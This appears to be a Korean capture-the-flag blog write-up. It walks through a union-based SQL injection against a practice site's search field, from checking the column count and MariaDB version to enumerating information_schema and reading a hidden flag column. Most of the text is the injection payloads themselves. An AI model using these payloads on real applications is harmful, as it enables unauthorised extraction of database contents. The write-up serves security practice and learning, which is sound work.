select 게시글 from 테이블 where Title like '%%'
' union select 1,2,3;-- -
union select 작동 확인
' union select version(),2,3;-- -
MariaDB인 거 확인
MariaDB도 information_schema 가 존재
' union select table_name from information_shema.tables;-- -
' union select 1,2,(select table_name from information_schema.tables limit 1);-- -
' union select 1,2,(select table_name from information_schema.tables limit 1,2);-- -
일단 ALL_PLUGINS 테이블 하나 밖에 안보임
' union select 1,2,(select table_name from information_schema.tables limit 294,1);-- -
users 테이블 확인
' union select 1,2,(select table_name from information_schema.tables limit 293,1);-- -
hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69
수상한 테이블 확인
' union select 1,2,(select column_name from information_schema.columns where table_name='hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69' limit 0,1);-- -
idx 열 확인
' union select 1,(select column_name from information_schema.columns where table_name='hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69' limit 1,1),3;-- -
super_secret_flag_327a6c4304ad5938eaf0efb6cc3e53dc 열 확인
' union select 1,(select super_secret_flag_327a6c4304ad5938eaf0efb6cc3e53dc from hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69 limit 0,1),3;-- -
flag 확인
'Web > SECGAME' 카테고리의 다른 글
| SECGAME - RESPONSE (0) | 2025.04.01 |
|---|